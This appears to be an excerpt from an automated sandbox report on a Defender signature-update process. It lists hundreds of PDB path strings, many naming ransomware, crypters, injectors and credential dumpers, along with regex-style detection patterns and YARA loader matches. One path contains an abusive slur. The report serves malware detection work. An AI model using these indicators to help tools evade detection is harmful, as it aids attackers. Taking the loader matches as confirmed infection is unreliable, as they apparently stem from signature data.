Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000026.00000003.18351876437.00000138BCDCA000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: module_ls.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000026.00000003.18309839037.00000138BE5D9000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: ,IKlllQWgbhejkWEJKHw7\\werrnJEKLJ32hjelkk.PDB source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: DDTBG.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: version.pdb@SH source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: LERKBleRM.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \devilman\xxxxx\catfight\iygmygjkxtyu.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb0 source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: samlib.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: DebugRelease\Form1.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: ntoskrnl.pdb source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp
Source:	Binary string: SAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-25cd2963.exe, 00000025.00000000.18201763876.00007FF7202FF000.00000002.00020000.sdmp
Source:	Binary string: feclient.pdb source: MpSigStub.exe, 00000026.00000003.18332439507.00000138BD299000.00000004.00000001.sdmp
Source:	Binary string: \regentry.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \ircBot\ircBot\obj\Release\LolCache.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: blackbox.pdbyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: /dQWPICl_Hude1v.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: PasswordFox.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb] source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: winsta.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Deonan\Release\Deonan.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb3 source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \SharPersist.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: WizzByPass.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: iwJL##$@#*$^#%@!^$.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: Corona.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: tkDecript.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug\|Release).{0,20}\\[A-Z]\1(Exe\|Dll)\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \Razvan\Desktop\Oh yeah\photo\photo\obj\Debug\leagueoflegends.pdb source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd1d8af6.146.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AllatoriJARObfuscator

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.raw.unpack, type: UNPACKEDPE
